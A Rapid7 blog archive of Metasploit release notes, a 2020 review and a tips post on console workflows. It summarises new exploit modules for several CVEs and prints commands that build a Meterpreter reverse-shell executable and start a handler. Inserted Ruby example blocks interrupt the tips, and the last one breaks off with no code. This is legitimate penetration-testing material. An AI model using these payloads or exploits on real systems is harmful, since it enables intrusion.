Tag Archives: Metasploit

Metasploit Wrap-Up

Post Syndicated from Louis Sato original https://blog.rapid7.com/2021/01/29/metasploit-wrap-up-96/

MobileIron MDM Hessian-Based Java Deserialization RCE


Our very own wvu-r7 has added exploits/linux/http/mobileiron_mdm_hessian_rce, which exploits an ACL bypass in MobileIron MDM products (CVE-2020-15505) to execute a Java deserialization attack, using a Groovy gadget, against a Hessian-based endpoint. MDM helps organizations manage and control all employees’ devices, and it must be publicly reachable to synchronize those devices, which makes it an appealing target. This vulnerability has been included on the U.S. National Security Agency’s list of vulnerabilities known to be exploited by Chinese state-sponsored threat actors. More information about this exploit can be found here.

PEAR Archive_Tar < 1.4.11 Arbitrary File Write

exploits/multi/fileformat/archive_tar_arb_file_write has been added by gwillcox-r7, adding support for CVE-2020-28949. CVE-2020-28949 affects the Archive_Tar plugin of the PEAR PHP development framework and is caused by Archive_Tar’s lack of validation of file stream wrappers contained within filenames, which allows an arbitrary file containing user-controlled content to be written to an arbitrary location on disk.

Micro Focus UCMDB Java Deserialization Unauthenticated Remote Code Execution

Community contributor Pedro Ribeiro has added exploits/multi/http/microfocus_ucmdb_unauth_deser, which exploits two vulnerabilities, CVE-2020-11853 and CVE-2020-11854, that when chained allow an attacker to achieve unauthenticated remote code execution in Micro Focus UCMDB. CVE-2020-11854 is a hardcoded password for the "diagnostics" user, which allows attackers to log into UCMDB. CVE-2020-11853 takes advantage of the fact that, after authentication, almost all of the UCMDB client’s communication is done using Java serialized objects, allowing an authenticated attacker to inject a malicious Java serialized object into the POST body of one of the vulnerable endpoints to achieve remote code execution as root or SYSTEM.

New modules (5)

Enhancements and features

  • PR #14383 by h00die added two new external module examples in python, one as an exploit module example and the other as an auxiliary example.
  • PR #14651 by bcoles updates msftidy to verify that all modules have a module description.
  • PR #14564 by adfoster-r7 updates internal Metasploit libraries to dependency inject the currently active module when performing tab completion for users.
  • PR #14432 by cn-kali-team adds a new function report_creds to the kiwi.rb and priv/password.rb Meterpreter libraries. This function ensures that credentials dumped via Kiwi or via the hashdump command are now appropriately captured in the creds database, allowing users to replay them later on, or attempt to crack them and obtain the plain text password.

Bugs fixed

  • PR #14664 by s1e2b3i4 applies a fix to auxiliary/scanner/ssh/ssh_enumusers.rb to ensure that error messages for users who don’t exist on the target system, or who can’t connect remotely, are not displayed unless the VERBOSE flag is set.
  • PR #14657 by jmartin-r7 updates Metasploit’s docker build process to download pip from an alternative GitHub download source now that python2 will no longer be available after January 30th 2021.
  • PR #14650 by bcoles updates local_exploit_suggester to correctly store rhost information in the database, as previously this would crash.
  • PR #14647 by zeroSteiner addresses a typo introduced in #14582 whereby a non-existent value was used to populate the tab completion array for the run command of modules that support actions as commands, resulting in msfconsole crashing when tab completion was attempted. Users should now be able to use tab completion with the run command without errors.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Metasploit Wrap-Up

Post Syndicated from Dean Welch original https://blog.rapid7.com/2021/01/22/metasploit-wrap-up-95/


Windows print spooler vulnerability…again

Here we have bwatters-r7 coming in with an exploit for CVE-2020-1337, a patch bypass for a Windows print spooler elevation of privilege vulnerability that was exploited in the wild last year. The original vulnerability, CVE-2020-1048, garnered quite a bit of interest from the security community, in large part because the Windows print spooler is a legacy component that was abused as part of the Stuxnet attack. Alex Ionescu and Yarden Shafir, the researchers who discovered CVE-2020-1048, have a great write-up here if you’re looking for a deep dive.

The first patch that Microsoft released for CVE-2020-1048 uses a check to verify that the process creating a printer port targeting a location has privileges to write to that location. Unfortunately, that patch only checks the permissions when the port is created. The bypass utilized here simply creates the port pointing to a location the user can write to. Then, after the printer port is created, it creates a symlink from the location pointed to by the printer port to a second location. The check will pass because the link is only created after the check, but the link will be in place when the print takes place, so the file write will pass through and end up in the trusted location.

A very prompt fix

Chiggins gave us a fix for the msfconsole prompt with PR #14635. For those not in the know, you can set your prompt in the console with the set Prompt command. Thanks to Chiggins, setting your prompt to the timestamp works again! So feel free to give it a go with set Prompt %T.

New Modules (1)

Enhancements and features

  • #14583 from dwelch-r7 This PR adds the ability for the framework to detect when a given nmap scan requires sudo privileges and re-run nmap with sudo, prompting the user for the password in the usual way.
  • #14621 from geyslan This PR reduces the size of the linux/x64/shell_bind_tcp_random_port payload and maintains the functionality.
  • #14630 from h00die Adds the hardcoded creds found in Zyxel devices to the unix creds files – as captured within CVE-2020-29583

Bugs Fixed

  • #14597 from arno01 Updates the modules/auxiliary/gather/external_ip.rb module to provide a valid default vhost setting
  • #14609 from dwelch-r7 A bug was fixed in the lib/msf/core/exploit/remote/http_client.rb and lib/msf/core/opt_http_rhost_url.rb libraries whereby if a user used a /etc/hosts entry for resolving a hostname to an IP address, the VHOST datastore variable would be set incorrectly. This has now been resolved by improving the logic of these two libraries and updating the spec checks accordingly.
  • #14632 from zomfg-zombie This fixes a compatibility issue with the OpenSMTPD MAIL FROM RCE exploit, which was failing to function when the target host’s shell uses a strictly POSIX-compatible read utility, as is the case on Ubuntu.
  • #14635 from Chiggins A bug was fixed in the lib/rex/ui/text/shell.rb library whereby users who used the %T character within their command prompts would not get the full timestamp information. A fix has been applied to address this regression so that users can now get the full timestamp information within their prompts.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Metasploit Wrap-Up

Post Syndicated from Alan David Foster original https://blog.rapid7.com/2021/01/15/metasploit-wrap-up-94/

Commemorating the 2020 December Metasploit community CTF


A new commemorative banner has been added to the Metasploit console to celebrate the teams that participated in the 2020 December Metasploit community CTF and achieved 100 or more points:


If you missed out on participating in this most recent event, be sure to follow the Metasploit Twitter and Metasploit blog posts. If there are any future Metasploit CTF events, all details will be announced there!

If the banners aren’t quite your style, you can always disable them with the quiet flag:

msfconsole -q

Windows privilege escalation via Cloud Filter driver

Our very own gwillcox-r7 has created a new module for CVE-2020-1170, a Cloud Filter arbitrary file creation EOP, with credit to James Forshaw for the initial vulnerability discovery and proof of concept. The Cloud Filter driver, cldflt.sys, on Windows 10 v1803 and later, prior to the December 2020 patches, did not set the IO_FORCE_ACCESS_CHECK or OBJ_FORCE_ACCESS_CHECK flags when calling FltCreateFileEx() and FltCreateFileEx2() within its HsmpOpCreatePlaceholders() function with attacker-controlled input. This meant that files were created with KernelMode permissions, thereby bypassing any security checks that would otherwise prevent a normal user from creating files in directories they don’t have permission to write to.

This module abuses this vulnerability to perform a DLL hijacking attack against the Microsoft Storage Spaces SMP service, which grants the attacker code execution as the NETWORK SERVICE user. Users are strongly encouraged to set the PAYLOAD option to one of the Meterpreter payloads, as doing so will allow them to subsequently escalate their new session from NETWORK SERVICE to SYSTEM by using Meterpreter’s getsystem command to perform RPCSS Named Pipe Impersonation and impersonate the SYSTEM user.

New Modules (3)

Enhancements and Features

  • #14562 from zeroSteiner Improves the readability of Meterpreter error messages by replacing the command ID with the command name
  • #14582 from zeroSteiner This adds the possibility to run post module actions as commands. This also consolidates and improves existing VSS modules into one new single module with multiple actions.
  • #14600 from zeroSteiner The FileSystem mixin has been reorganized and a number of function aliases have been added to assist developers in using the module. Additionally new YARD documentation has been added to better explain the functionality of several of the FileSystem mixin’s functions to assist developers in determining when to use these functions.
  • #14606 from bwatters-r7 This adds a banner commemorating all of the teams that participated in the Q4 2020 CTF.

Bugs Fixed

  • #14515 from timwr This fixes an issue with both the cmd/unix/reverse_awk and cmd/unix/bind_awk payloads, which were not correctly terminating after a session was closed. This was causing endless session creation and high CPU consumption on the target.
  • #14605 from zeroSteiner This PR fixes an issue where the VHOST option was not being correctly populated when the RHOST option was a domain name
  • #14613 from adfoster-r7 Fixes a regression error with modules depending on NTLM such as cve_2019_0708_bluekeep
  • #14614 from zeroSteiner A bug within the module for CVE-2020-17136 occurred where a relative path was used instead of an absolute path when attempting to load the C# exploit exe. The code has been replaced with a call to File.expand_path() to allow the module to dynamically determine the full path to this file, allowing users to use the module regardless of which directory they are in when running msfconsole.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest. To install fresh without using git, you can use the open-source-only Nightly Installers or the binary installers (which also include the commercial edition).

Metasploit Wrap-Up

Post Syndicated from Sonny Gonzalez original https://blog.rapid7.com/2021/01/08/metasploit-wrap-up-93/

Struts2 Multi Eval OGNL RCE


Our very own zeroSteiner added exploit/multi/http/struts2_multi_eval_ognl, which exploits Struts2 evaluating OGNL expressions in HTML attributes multiple times (CVE-2019-0230 and CVE-2020-17530). The CVE-2019-0230 OGNL chain for remote code execution requires a one-time chain to enable the RCE gadget, which is handled automatically by the module. The OGNL gadget chain for CVE-2020-17530 will echo the command output. Both chains use a simple mathematical expression to ensure that evaluation occurs. These vulnerabilities are application-dependent, and the user does need to know which CVE they are targeting. Setting the NAME parameter appropriately and using the check method to ensure evaluation takes place inside an HTML attribute are key to successful exploitation.

JuicyPotato-like Windows privilege escalation exploit

Exploit module exploits/windows/local/bits_ntlm_token_impersonation was added by Metasploit contributor C4ssandre. It exploits BITS connecting to a local Windows Remote Management (WinRM) server at startup time. A fake WinRM server listening on port 5985 is started by a DLL loaded from a previous unprivileged Meterpreter session. The fake server triggers BITS and then steals a SYSTEM token from the subsequent authentication request. The token is then used to start a new process and launch powershell.exe as the SYSTEM user, which downloads a malicious PowerShell script from a second local HTTP server and executes it without writing any files to disk. The exploit is based on decoder’s PoC. It has been successfully tested on Windows 10 (10.0 Build 19041) 32-bit.

Pulse Connect Secure Gzip RCE

Metasploit contributor h00die added an exploit that targets Pulse Connect Secure server version 9.1R8 and earlier. The vulnerability was originally discovered by the NCC Group. It achieves authenticated remote code execution as root by uploading an encrypted config that contains an overwrite for a Perl template file. This module was made possible by rxwx, who shared the encryption code with the author. Admin credentials are required for successful root access. The module has been tested against server version 9.1R8.

New modules (8)

Enhancements and features

  • PR 14566 from zeroSteiner Module auxiliary/server/socks_proxy replaces modules/auxiliary/server/socks4a.rb and modules/auxiliary/server/socks5.rb.
  • PR 14538 from jmartin-r7 Improves Metasploit’s XML importer error messages when data is not Base64 encoded.
  • PR 14528 from zeroSteiner Clarifies Windows Meterpreter payloads description support of XP SP2 or newer.
  • PR 14522 from axxop Replaces the hardcoded default Shiro encryption key with a new datastore option that allows users to specify rememberMe cookie encryption key.
  • PR 14517 from timwr Changes the osx/x64/shell_reverse_tcp payload to be generated with Metasm and captures and sends STDERR to msfconsole.
  • PR 14509 from egypt This adds a Java target to the Apache Solr RCE exploit module and fixes several payload issues.
  • PR 14444 from dwelch-r7 Adds a couple of missing methods from the remote data services for adding and deleting routes.

Bugs fixed

  • PR 14589 from timwr Fixes a file download issue with the Android Meterpreter’s download command.
  • PR 14532 from bcoles Fixes a NoMethodError exception caused by the Msf::Post::Common mixin not being included in post/android/capture/screen.
  • PR 14530 from jmartin-r7 Fixes a failing test on macOS caused by IPv6 vs IPv4 result precedence.
  • PR 14475 from dwelch-r7 Fixes the EICAR canary check.
  • PR 14334 from Summus-git Fixes a socket-closing bug in the x86 Linux bind shell payloads.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Metasploit 2020 Wrap-Up

Post Syndicated from Spencer McIntyre original https://blog.rapid7.com/2020/12/30/metasploit-2020-wrap-up/


2020 was certainly an interesting year. There were quite a few newsworthy events and some fantastic exploit content released. Let’s take a look at what 2020 meant for Metasploit.

Quick stats

Some quick statistics for Metasploit’s year.

  • 737 pull requests merged (and counting)
  • A net gain of +179 non-payload modules
  • 50 new Auxiliary modules
  • 134 new Exploit modules
  • 23 new Post modules
  • 2 CTFs hosted
  • 1 new version

Metasploit 6

The Metasploit team released version 6.0 of the framework over the summer. This major change brought quite a few improvements on two fronts: the Meterpreter transport protocol and SMBv3 support for client connections. Both of these offered transport encryption for common operations performed by Metasploit, providing better security for the users. Additionally, to showcase the SMBv3 support, Metasploit added a new module to perform agentless dumping of SAM hashes and LSA secrets (including cached creds) from remote Windows targets. The technique employed by this module has become very popular due to its reliability, and the native integration into the Metasploit Framework makes it easily accessible for users with all the related benefits like database and pivoting support.

CTFs

There were not one but two open CTFs hosted by the Metasploit team in 2020. These events invited the community to solve challenges in a fun and competitive environment. The most recent event included 1,903 users registered across 874 teams.

New module highlights

  • exploit/windows/local/anyconnect_lpe (CVE-2020-3153 & CVE-2020-3433) – This exploit module was an excellent example of a trend of patch bypasses this year. The module is capable of leveraging both the original vulnerability along with the bypass for maximum coverage.
  • exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move (CVE-2020-0787) – This exploit targeted Windows BITS to overwrite a DLL. Exploiting native services included on Windows is always useful, and the technique leveraged here to use the file system operation to obtain code execution was an interesting case.
  • post/multi/gather/enum_software_versions – It’s often important for users to know what is on a system they have compromised. This new module helps make that process simple by enumerating the installed software and their versions, allowing the user to identify interesting entries for exploitation or living-off-the-land techniques.
  • exploit/multi/misc/weblogic_deserialize_badattrval (CVE-2020-2555) – WebLogic is always a valuable target and deserialization vulnerabilities are quite reliable by nature. That combination makes this module particularly useful.
  • exploit/multi/misc/weblogic_deserialize_badattr_extcomp (CVE-2020-2883) – Another more recent WebLogic RCE that makes use of deserialization. Similar to CVE-2020-2555, this module is equally useful.
  • exploit/windows/local/cve_2020_0668_service_tracing (CVE-2020-0668) – Users can never have enough Windows LPE exploits, and this module offered another reliable vector. This module uses a simple DLL-based technique to obtain code execution from a file system operation.

SharePoint

Metasploit added its first exploits for the popular SharePoint platform since 2010. Four exploit modules were added: three leverage XML injection flaws, while the fourth targets a server-side include. These exploits leverage .NET deserialization to execute operating system commands, avoiding any kind of memory corruption and making exploitation relatively reliable. The .NET deserialization gadgets leveraged by these modules were also new in 2020. This functionality came in the form of a new library that even includes a command line tool for generating gadget chains for researchers.

Over the course of the year, there were some interesting patterns that were observable. In general, there seemed to have been an increase in vulnerabilities that were disclosed and related to an insufficient remediation for a previous vulnerability. These so-called patch bypasses seem to be indicative of the increasing complexity of vulnerabilities and their respective solutions. Additionally, there were multiple exploits added to Metasploit that leveraged vulnerable file system operations to obtain code execution on Windows. These LPEs used a combination of techniques that are becoming increasingly common including op-locks and junctions. Metasploit is working on better support for these primitives to facilitate exploitation of vulnerabilities that use them.

With all that the project accomplished in 2020, the team looks forward to what 2021 will hold. New features are being discussed, and as always, the module pipeline continues to flow. Our sincere gratitude goes to all the members of the community that contributed to the project this year.


Metasploit Tips and Tricks for HaXmas 2020

Post Syndicated from Alan David Foster original https://blog.rapid7.com/2020/12/23/metasploit-tips-and-tricks-for-haxmas-2020-2/


For this year’s HaXmas, we’re giving the gift of Metasploit knowledge! We’ll cover a mix of old, new, or recently improved features that you can incorporate into your workflows. Some of our readers may already know these tips and tricks for using Metasploit, but for the others who aren’t aware of them, it’s your lucky day!

Debugging failed HTTP Modules

There’s nothing more upsetting than not getting a Meterpreter session due to the misconfiguration of module options. I have found that the quickest way to sanity-check failed HTTP Modules is to set the HTTPTrace option to true before running your module:

set HTTPTrace true

This will enable the logging of raw HTTP requests and responses:

msf6 > use scanner/http/title
msf6 auxiliary(scanner/http/title) > set RHOSTS 127.0.0.1
RHOSTS => 127.0.0.1
msf6 auxiliary(scanner/http/title) > set HttpTrace true
HttpTrace => true
msf6 auxiliary(scanner/http/title) > run
####################
# Request:
####################
GET / HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)

####################
# Response:
####################
HTTP/1.0 200 OK
Server: SimpleHTTP/0.6 Python/2.7.16
Date: Wed, 16 Dec 2020 01:16:32 GMT
Content-type: text/html; charset=utf-8
Content-Length: 178

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"><html>
<title>Directory listing for /</title>
<body>
<h2>Directory listing for /</h2>
<hr>
<ul>
</ul>
<hr>
</body>
</html>
[+] [127.0.0.1:80] [C:200] [R:] [S:SimpleHTTP/0.6 Python/2.7.16] Directory listing for /
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/http/title) >

This is a great way to quickly see why your modules have failed. In some scenarios, you may find that you’ve simply forgotten to specify the TARGETURI or VHOST options correctly, and after rerunning the module, you might even have a session.

Inline run options

Did you know that you can inline Metasploit’s options when running a module? When paired with your terminal’s reverse-i-search ctrl+r capabilities, it can be a real time-saver when wanting to rerun Metasploit modules again with the same options:

msf6 > use scanner/http/title
msf6 auxiliary(scanner/http/title) > run RHOSTS=127.0.0.1
[+] [127.0.0.1:80] [C:200] [R:] [S:SimpleHTTP/0.6 Python/2.7.16] Directory listing for /
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/http/title) >

Providing inlined options can also be useful for quickly enabling the HttpTrace functionality or verbose mode of a module:

msf6 auxiliary(scanner/http/title) > run HttpTrace=true VERBOSE=true
####################
# Request:
####################
GET / HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)

####################
# Response:
####################
HTTP/1.0 200 OK
Server: SimpleHTTP/0.6 Python/2.7.16
Date: Wed, 16 Dec 2020 01:16:32 GMT
Content-type: text/html; charset=utf-8
Content-Length: 178

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"><html>
<title>Directory listing for /</title>
<body>
<h2>Directory listing for /</h2>
<hr>
<ul>
</ul>
<hr>
</body>
</html>
[+] [127.0.0.1:80] [C:200] [R:] [S:SimpleHTTP/0.6 Python/2.7.16] Directory listing for /
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/http/title) >

This year, we improved on these capabilities even further, thanks to this pull request. Metasploit now supports tab completion for both option names and values, too! Just use the tab key on your keyboard and you’ll be good to go:

set <tab><tab>
set RHOSTS=<tab><tab>

Note that this is a lesser-used piece of Metasploit’s functionality, so if you run into any issues, be sure to create an issue and send the details our way.

Quickly interacting with new sessions

Metasploit provides support for quickly interacting with the most recently created session by using a session ID of -1, for instance:

msf6 > sessions -i -1
[*] Starting interaction with 4…

Note that this trick also works when running post modules:

use modules/post/multi/manage/screenshare
set SESSION -1
set SRVHOST vmnet8
set URIPATH /
run

But wait, there’s more! Thanks to this pull request a few years ago, you can save additional characters by omitting the -i flag when you want to interact with a session:

msf6 > sessions -1
[*] Starting interaction with 4…
meterpreter > sessions 1
[*] Backgrounding session 4..
[*] Starting interaction with 1…

Skipping msfvenom’s boot time

Name a more iconic duo than msfvenom and exploit/multi/handler. I’ll wait.

In the meantime, though, did you know that you can generate payloads and create handlers without even leaving the Metasploit console? Just open up Metasploit and run through the payload generation and handler creation steps directly from the payload module:

# Use the payload module:
use windows/meterpreter/reverse_https
set LHOST 127.0.0.1
set LPORT 4443
set SessionCommunicationTimeout 0
set ExitOnSession false

# Create the executable, as an alternative to msfvenom:
generate -o reverse_windows.exe -f exe

# Create a handler, as an alternative to exploit/multi/handler:
to_handler

We’ve found that this workflow can be faster in comparison to using msfvenom directly, which can be slow in comparison to a warmed-up Metasploit console.

Resource scripts

Resource scripts are great for streamlining your repetitive workflows. For instance, if we wanted to turn the above workflow of "using a module, generating a particular payload, and creating a handler" into a reusable resource script, simply create a file my_workflow.rc with the commands that you’d like to run:

cat my_workflow.rc
use windows/meterpreter/reverse_https
set LHOST 127.0.0.1
set LPORT 4443
set SessionCommunicationTimeout 0
set ExitOnSession false
generate -o reverse_windows.exe -f exe
to_handler

Running a resource file from the console is simple: just use the resource command. Metasploit will load the file, then execute each line one at a time:

msf6 > resource /example/my_workflow.rc
[*] Processing /example/my_workflow.rc for ERB directives.
resource (/example/my_workflow.rc)> use windows/meterpreter/reverse_https
resource (/example/my_workflow.rc)> set LHOST 127.0.0.1
LHOST => 127.0.0.1
resource (/example/my_workflow.rc)> set LPORT 4443
LPORT => 4443
resource (/example/my_workflow.rc)> set SessionCommunicationTimeout 0
SessionCommunicationTimeout => 0
resource (/example/my_workflow.rc)> set ExitOnSession false
ExitOnSession => false
resource (/example/my_workflow.rc)> generate -o reverse_windows.exe -f exe
[*] Writing 73802 bytes to reverse_windows.exe…
resource (/example/my_workflow.rc)> to_handler
[*] Payload Handler Started as Job 2

By default, Metasploit will run the resource script found in its config directory at ~/.msf4/msfconsole.rc, or you can specify additional resource scripts to be run when msfconsole starts up. This can be useful for setting options such as global logging or default LHOST values:

msfconsole -r /example/my_workflow.rc

Writing resource scripts can sometimes be a chore, which is why Metasploit also provides the ability to save recently executed commands directly to a specified resource script location:

# Viewing the makerc command usage:
msf6 > help makerc
Usage: makerc <output rc file>

Save the commands executed since startup to the specified file.

# Saving the last commands to a reusable resource script:
msf6 > makerc example.rc
[*] Saving last 4 commands to examplerc …

For the power users of Metasploit, resource scripts also support the ability to run arbitrary Ruby code. This functionality makes it possible to interact directly with Metasploit’s Framework object programmatically:

use windows/meterpreter/reverse_https
<ruby>
# Run arbitrary ruby code which can interact with the Metasploit framework object
puts "Currently running with Metasploit version: #{framework.version}!"
</ruby>

There is also a treasure trove of resource scripts buried within the Metasploit Framework repository that you may not be aware of: https://github.com/rapid7/metasploit-framework/tree/master/scripts/resource.
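To make the processing order above concrete (ERB directives are expanded first, then <ruby> blocks are evaluated with the framework object in scope, and every other line is run as a console command), here is a small stand-alone Ruby model of how msfconsole consumes a resource script. It is example code added for this page, not Metasploit's own load_resource implementation; the sample resource script and the FakeFramework stand-in for the real framework object are constructed assumptions.

```ruby
require 'erb'
require 'stringio'

# Constructed sample resource script (not from the page): an ERB directive, plain
# console commands and an embedded <ruby> block, in the order msfconsole sees them.
SAMPLE_RC = <<~'RC'
  <% lhost = "127.0.0.1" %>
  use windows/meterpreter/reverse_https
  set LHOST <%= lhost %>
  set LPORT 4443
  <ruby>
  # This block runs as Ruby with a binding that exposes the framework object.
  puts "Currently running with Metasploit version: #{framework.version}!"
  </ruby>
  to_handler
RC

# Minimal stand-in for the framework object msfconsole hands to <ruby> blocks (assumption).
FakeFramework = Struct.new(:version)

# Evaluate a <ruby> block with `framework` in scope, capturing whatever it prints.
def run_ruby_block(code, framework)
  captured = StringIO.new
  original = $stdout
  $stdout = captured
  binding.eval(code) # `framework` is a local here, so the block can reference it
  captured.string
ensure
  $stdout = original
end

# Simplified model of msfconsole's resource handling:
#   1. expand ERB directives over the whole file,
#   2. walk the result line by line, collecting <ruby>...</ruby> blocks and evaluating them,
#   3. treat every other non-blank line as a console command.
# Returns the console commands and the output produced by the ruby blocks.
def process_resource(text, framework)
  expanded = ERB.new(text).result(binding)
  commands = []
  ruby_output = []
  buffer = nil
  expanded.each_line do |raw|
    line = raw.strip
    next if line.empty?
    if line == '<ruby>'
      buffer = +''
    elsif line == '</ruby>'
      ruby_output << run_ruby_block(buffer, framework)
      buffer = nil
    elsif buffer
      buffer << raw
    else
      commands << line
    end
  end
  raise 'unterminated <ruby> block' if buffer
  { commands: commands, ruby_output: ruby_output }
end

if __FILE__ == $PROGRAM_NAME
  result = process_resource(SAMPLE_RC, FakeFramework.new('6.0.30-dev'))
  result[:commands].each { |cmd| puts "resource> #{cmd}" }
  result[:ruby_output].each { |out| print out }
end
```

The ordering matters in practice: an ERB directive can compute a value (a host name, a date-stamped output file) that later plain commands use, while a <ruby> block sees the already-expanded text and has the framework object available, which ERB does not.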

Refining search results

This year, we made improvements to the search functionality of Metasploit. Specifying additional search terms will now continue to refine your search results.

Previously, when using the command search postgresql login, all modules matching either postgresql or login would be returned:

msf6 > search postgresql login

Matching Modules
================

   #    Name                                           Disclosure Date  Rank    Check  Description
   -    ----                                           ---------------  ----    -----  -----------
   0    auxiliary/admin/appletv/appletv_display_image                   normal  No     Apple TV Image Remote Control
   1    auxiliary/admin/appletv/appletv_display_video                   normal  No     Apple TV Video Remote Control
   … many modules later …
   248  post/windows/manage/sticky_keys                                 normal  No     Sticky Keys Persistance Module
   249  post/windows/manage/wdigest_caching                             normal  No     Windows Post Manage WDigest Credential Caching

Interact with a module by name or index, for example use 249 or use post/windows/manage/wdigest_caching

Now, with the newly updated search command, running search postgresql login will only return modules matching both postgresql and login:

msf6 > search postgresql login

Matching Modules
================

   #  Name                                       Disclosure Date  Rank    Check  Description
   -  ----                                       ---------------  ----    -----  -----------
   0  auxiliary/scanner/postgres/postgres_login                   normal  No     PostgreSQL Login Utility

Interact with a module by name or index, for example use 0 or use auxiliary/scanner/postgres/postgres_login

This functionality works well with the search keywords, too:

msf6 > search cve:2020 type:aux tomcat ghostcat

Matching Modules
================

   #  Name                                  Disclosure Date  Rank    Check  Description
   -  ----                                  ---------------  ----    -----  -----------
   0  auxiliary/admin/http/tomcat_ghostcat  2020-02-20       normal  No     Ghostcat

Interact with a module by name or index, for example use 0 or use auxiliary/admin/http/tomcat_ghostcat
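To make the old-versus-new search semantics concrete, here is an added Ruby example (not Metasploit's own search code) that implements both behaviours over a small constructed module catalogue: matching that accepts any free-text term (the old OR behaviour) beside matching that requires every term and every keyword filter (the refined AND behaviour shown above). The catalogue, the handling of the type: and cve: keywords, and the aux alias for auxiliary are assumptions made for the example.

```ruby
# Constructed sample catalogue standing in for Metasploit's module metadata (assumption:
# the real index carries many more fields; name, type, cve and description suffice here).
MODULES = [
  { name: 'auxiliary/scanner/postgres/postgres_login', type: 'auxiliary',
    cve: [], description: 'PostgreSQL Login Utility' },
  { name: 'auxiliary/admin/http/tomcat_ghostcat', type: 'auxiliary',
    cve: ['2020-1938'], description: 'Ghostcat' },
  { name: 'exploit/linux/postgres/postgres_payload', type: 'exploit',
    cve: [], description: 'PostgreSQL for Linux Payload Execution' },
  { name: 'auxiliary/scanner/ssh/ssh_login', type: 'auxiliary',
    cve: [], description: 'SSH Login Check Scanner' },
  { name: 'post/windows/manage/wdigest_caching', type: 'post',
    cve: [], description: 'Windows Post Manage WDigest Credential Caching' }
].freeze

# Aliases accepted by the type: keyword (assumption modelled on the search output above).
TYPE_ALIASES = { 'aux' => 'auxiliary' }.freeze

# Split a query into keyword filters (key:value tokens) and free-text terms.
def parse_query(query)
  keywords = Hash.new { |h, k| h[k] = [] }
  terms = []
  query.split.each do |token|
    key, value = token.split(':', 2)
    if value
      keywords[key] << value
    else
      terms << token
    end
  end
  [keywords, terms]
end

# A free-text term matches when it appears in the module name or description.
def term_match?(mod, term)
  "#{mod[:name]} #{mod[:description]}".downcase.include?(term.downcase)
end

# A keyword filter matches when any of its values applies to the module.
def keyword_match?(mod, key, values)
  case key
  when 'type' then values.any? { |v| mod[:type] == TYPE_ALIASES.fetch(v, v) }
  when 'cve'  then values.any? { |v| mod[:cve].any? { |c| c.include?(v) } }
  else false # an unknown keyword filters everything out
  end
end

# Shared filtering: every keyword filter must hold, and the free-text terms are combined
# with the supplied predicate (:any? for the old behaviour, :all? for the refined one).
def run_search(query, combine)
  keywords, terms = parse_query(query)
  MODULES.select do |mod|
    keywords.all? { |key, values| keyword_match?(mod, key, values) } &&
      (terms.empty? || terms.send(combine) { |t| term_match?(mod, t) })
  end.map { |mod| mod[:name] }
end

# Old behaviour: a module matching either term is returned.
def search_any(query)
  run_search(query, :any?)
end

# Refined behaviour: each additional term narrows the result set further.
def search_all(query)
  run_search(query, :all?)
end

if __FILE__ == $PROGRAM_NAME
  puts "old (OR):  #{search_any('postgresql login').inspect}"
  puts "new (AND): #{search_all('postgresql login').inspect}"
  puts "keywords:  #{search_all('cve:2020 type:aux tomcat ghostcat').inspect}"
end
```

With the OR behaviour, 'postgresql login' pulls in every login scanner and every PostgreSQL module; with the AND behaviour only the module that carries both words survives, which is why adding terms now narrows rather than widens the list.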

Developing modules?

There are lots of great workflow capabilities built into Metasploit for our users, but there’s also a few useful tricks for developers!

Let’s start our journey with file reloading. It turns out that the best improvement to a developer’s productivity is the ability to reload files in Metasploit without having to close and reopen it. As a result, these commands will save you a lot of time:

  • reload: Reload the latest version of the active module from the file system.
  • reload_lib -a: Reload any changed files that are in your current Git working tree, other than modules. This is perfect for changing core library files.
  • reload_all: Reload all modules from all configured module paths.

There are also a few extra commands that you might find useful when modifying or developing a Metasploit module:

  • rerun: After reloading the currently active module, run the run command.
  • recheck: After reloading the currently active module, run the check command.
  • edit: Edit the currently open module within your local editor. It can also edit arbitrary files with edit <file_path>.

Finally, placing a breakpoint in your code can be a great way to immediately get to the root cause of issues. Just place the following snippet wherever you wish to enter into an interactive debugging environment:

require 'pry'; binding.pry

This will pause the execution of the currently running code when the breakpoint is hit and drop you into an interactive pry session.

There are a lot of useful commands to help explore the issue from here, for instance:

  • backtrace: Show the current call stack
  • up / down: Navigate the call stack
  • step: Move forward by a single execution step
  • next: Move forward by a single line
  • whereami: Show the current breakpoint location again
  • help: View all of the available commands and options

Ruby’s runtime introspection is also a great debugging aid. It lets you explore the available methods, classes, and variables within the current Ruby environment:

  • self: To find out what the current object is
  • self.methods: Find all available methods
  • self.methods.grep /send/: Search for a particular method that you’re interested in. This can be great for exploring unknown APIs.
  • self.method(:connect).source_location: Find out which file, and which line, defined a particular method
  • self.class.ancestors: For complex modules, this can be useful to see what mixins a Metasploit module is currently using
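The introspection calls listed above, run against a constructed class that is assembled from mixins the way a Metasploit module is. This is an added example written for this page, not Metasploit Framework code, and every name in it (TcpMixin, HttpClientMixin, ExampleModule, the helper functions) is hypothetical.

```ruby
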